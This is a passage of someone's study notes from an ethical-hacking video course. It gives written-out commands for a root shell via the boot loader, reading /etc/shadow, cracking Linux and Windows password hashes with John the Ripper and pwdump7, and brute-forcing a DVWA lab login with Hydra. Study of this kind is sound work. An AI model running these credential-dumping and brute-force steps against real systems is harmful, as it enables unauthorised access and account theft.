#	2.add to the end 'init=/bin/bash'

#	boot (press F10)

#	should be prompted with a root shell;
#	there are some limitations on the 
#	commands that are available

#	try accessing other user & change password:

cd /home/testUser
passwd testUser

#	try change root password:

passwd root

reboot 
#	or
poweroff

# 	window appears with 2 options:
#	1-kali gnu/linux, with linux ...
#	2-kali gnu/linux, with linux ... (recovery mode)

#	move arrow up/down to the 1st option and press 'e'

#	on the line that says:
#	linux /boot/vmlinus ... ro ...
#	1.make sure it 'ro' instead of 'rw'
#	2.make sure it doesn't have 'init=/bin/bash' at the end

#	go back

#	press enter on '1-kali gnu/linux, with linux ...'

#	see users and hashed passwords

cat /etc/shadow 

---------------------------------------------------
--	12:33:51 
	Cracking linux passwords with john the ripper -
	pt.2 ------------------------------------------
---------------------------------------------------	

###################################################
#	crack the users passwords
###################################################	
	
unshadow /etc/passwd /etc/shadow > pass 

cat pass

john -h 

john pass

###################################################
#	show the users passwords
###################################################	

john --show pass	
	
---------------------------------------------------
--	12:42:41 
	Cracking windows passwords with john the ripper
---------------------------------------------------		
	
# 	ATTENTION: 	running pwdump migth have been the
#				cause for my admin account profile
#				become corrupt

###################################################
#	download pwdump7
###################################################	

#	http://www.openwall.com/passwords/windows-pwdump
#	crt+f > pwdump7 by Andres Tarasco Acuna
#	download
#	extract zip

###################################################
#	download john the ripper
###################################################	

#	http://www.openwall.com/john/
#	ctrl+f > Download the latest community-enhanced version
#	download:
#	'John the Ripper 1.8.0-jumbo-1 (Windows binaries,ZIP,34 MB)'
#	extract zip

mkdir C:\Users\h\Downloads\delga-crack-password
cd C:\Users\h\Downloads\delga-crack-password

#	copy pwdump7 and john-the-ripper to delga-crack-password
	
#	open 2 cmd line windows as admin 

#	cmd line window 1 (as admin):
#	go to pwdump7 & dump users + hashed passwords
cd C:\Users\h\Downloads\delga-crack-password\pwdump7
PwDump7.exe > output.txt
notepad output.txt

#	cmd line window 2:
#	go to john and crack previous file
cd C:\Users\h\Downloads\delga-crack-password\john-the-ripper\john180j1w\run
john.exe --show ..\..\..\pwdump7\output.txt

#	the output should show some cracked passwords

#	-- NOT ON TUTORIAL --
#	other tests made from various sources:
#	test 1: DONE
#	generated md5 hash from: http://sherylcanter.com/encrypt.php
#	copy/paste hash to a text file (hash-test.txt)
#	executed the following command (without --show) and
#   result: the expected password

john.exe hash-test.exe

#	-- NOT ON TUTORIAL --
#	test 2: TODO
#	run john.exe ..\..\..\pwdump7\output.txt (without --show)
#	result: --

#	-- NOT ON TUTORIAL --
#	test 3: TODO
#	run john.exe ..\..\..\pwdump7\output.txt (without --show)
#	follow the instructions provided while trying to unhash
#	--format="nt2"
#	...
#	result: --

#	-- NOT ON TUTORIAL --
#	test 4: TODO
#	run john specifying that is a NTLM/MD4 hash;
#	ntlm has a 128 bit hash
#	result: --

#	-- NOT ON TUTORIAL --
#	test 5: TODO
#	follow this tutorial:
#	https://samsclass.info/123/proj10/px16-hashcat-win.htm
#	result: --

#	NOT ON TUTORIAL
#	read on:
#	https://en.wikipedia.org/wiki/LAN_Manager
#	https://en.wikipedia.org/wiki/NT_LAN_Manager

---------------------------------------------------
--	13:02:06 
	Hydra usage pt.1 ------------------------------
---------------------------------------------------

#	works on http and https

#	it can also be used to crack routers passwords

#	the -C is very useful in case there is some
#		suspicion on the use of default usernames
#		(ex: admin)

#	open dvwa on browser
#	> go to login page
#		http://localhost/apps/DVWA-master/login.php
#	> view source code of form
#	> get the 'name' property of the <input> tag for username
#		ex: <input type = 'text' name = 'username' />
#	> get the 'name' property of the <input> tag for password
#		ex: <input type = 'text' name = 'password' />

#	get portion of target url without baseUrl. example:
#	from this url:
#		http://localhost/apps/DVWA-master/login.php
#	get
# 		apps/DVWA-master/login.php

#	get the ip of the server (???) 
#		although he said 'the ip of the server',
#		the ip provided in the tutorial seems to 
#		be the ip of the machine conducting the
#		attack = 192.168.1.102

---------------------------------------------------
--	13:19:20 
	Hydra usage pt.2 ------------------------------
---------------------------------------------------

#	create a passwords list;

#	useful to test before using a file from the 
#	internet because hydra makes some confusion
#	in the parameters when attacking a login form
#	and i can only know that
#	when scan ends; if it takes a week to scan, 
#	then there is a chance that a result might 
#	not be returned; instead, it might show an
#	error a week after the command ran;

nano passlist

#	copy this passwords to 'pass-list-0' and save it
#	test
#	test45
#	hello
#	password

#	browse: 192.168.1.102/apps/DVWA-master/login.php

#	using burpsuite: (alternative to see page source)
#	follow the steps on 'sql injection part 3'
#	from
#	launch burpsuite 
#	to
#	close burpsuite (not included)

#	using burpsuite: (alternative to see page source)
#	try a failed login and check burpsuite info:
#	could not see the name of the tabs properly,
#	so 
#	open 2nd tab
#	open 1st tab
#	open 3rd tab (Headers)
#	i did not undertand why , but
#	copy the url shown, except last segment (example: .../1.1)
#	open 1st tab (Raw, i guess)
#	see the get method
#	click on 'forward'
#	retry a failed login
#	check on burpuite on the last tab that the method changed to post

#	hydra command
#	http-post-form has 3 params separated by ':'
#	1: url 
#
#		/apps/DVWA-master/login.php
#
#	2: username, password, login (burpuite shows login info
#		on the raw/headers tab refered on previous point)
#		
#		username=^USER^&password=^PASS^&Login=Login
#		
#	3: message the website provides when login fails
#
#		Login failed

hydra -l admin -P pass-list-0 192.168.1.102 http-post-form "/DVWA-master/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V

#	-- Result: 
#	1st time: ended fast but didn't say the correct 
#		password was 'password'
#	2st time: weird bug (more combinations testes than possible);
		took a lot of time for just 4 combinations

#	extra to tutorial:
#	follow this:
#	http://insidetrust.blogspot.pt/2011/08/using-hydra-to-dictionary-attack-web.html

#	extra to tutorial:
#	try to provide a list of usernames in
#	a text file

#	extra to tutorial:
#	follow this:
#	https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/

#	open gui hydra-gtk
#	try select different options and see command 
#	changing (on the end of the window)

---------------------------------------------------
--	13:37:41 
--	DoS attack pt.1 
--	introduction to denial of service attacks -----
---------------------------------------------------











===================================================
== Notes	
===================================================	
	
-vbox settings
	-https://www.virtualbox.org/manual/ch06.html

-Not done:
	-vpn	
		-04:02:00
		-to
		-04:15:50
		-reason: could not connect to wlan0

	-crack ap password	
		-06:42:00
		-to
		-04:48:03
		-reason: some commands kill network access

	-evil twin
		-9:17:02
		-to
		-9:46:24 
		-reason: errors when trying to install a 2nd nic

	-Post authentication exploitation
		-10:24:20 
		-to 
		-11:00:01
		-reason: there is some setting to do on the router;
			need wired access to router	

	-SQL Injection
		-11:01:01
		-to
		-12:09:02
		-reason: the dvwa app does not work with php7;
		tried to downgrade to php5.6 but failed;
		i'm stuck on part 3 (error 3), although
		i've watched and documented all the 5 parts.
		the command that is stopping me is:
			'add-apt-repository -y ppa:ondrej/php'
			
	-Cracking linux passwords with john the ripper
		-12:21:06
		-to
		-12:42:41
		-reason: on booting i'm not presented with 
		the 2 options that are shown in the tutorial:
			1-kali gnu/linux, with linux ...
			2-kali gnu/linux, with linux ... (recovery mode)
		
	
===================================================
== Contents	
===================================================


13:56:18 DoS attack pt.2 combine slowloris.pl with nmap
14:04:38 DoS attack pt.3 featuring hackers.org
14:14:24 Intro to metasploit and reverse shells
14:32:52 Metasploit starting from a two terminal setup
14:51:16 Making reverse shells persistent on another system and escalating privileges
15:07:51 Creating a persistent shell with metasploit
15:18:48 Using netcat to make any kind of connection you may need
15:38:49 How to upload a reverse shell onto a web server

===================================================
== Scripts	
===================================================

scripts 

07:53:38	dos 	delgadillo-youtube-s1-dos.sh 	not in dropbox




























































































	
	
	
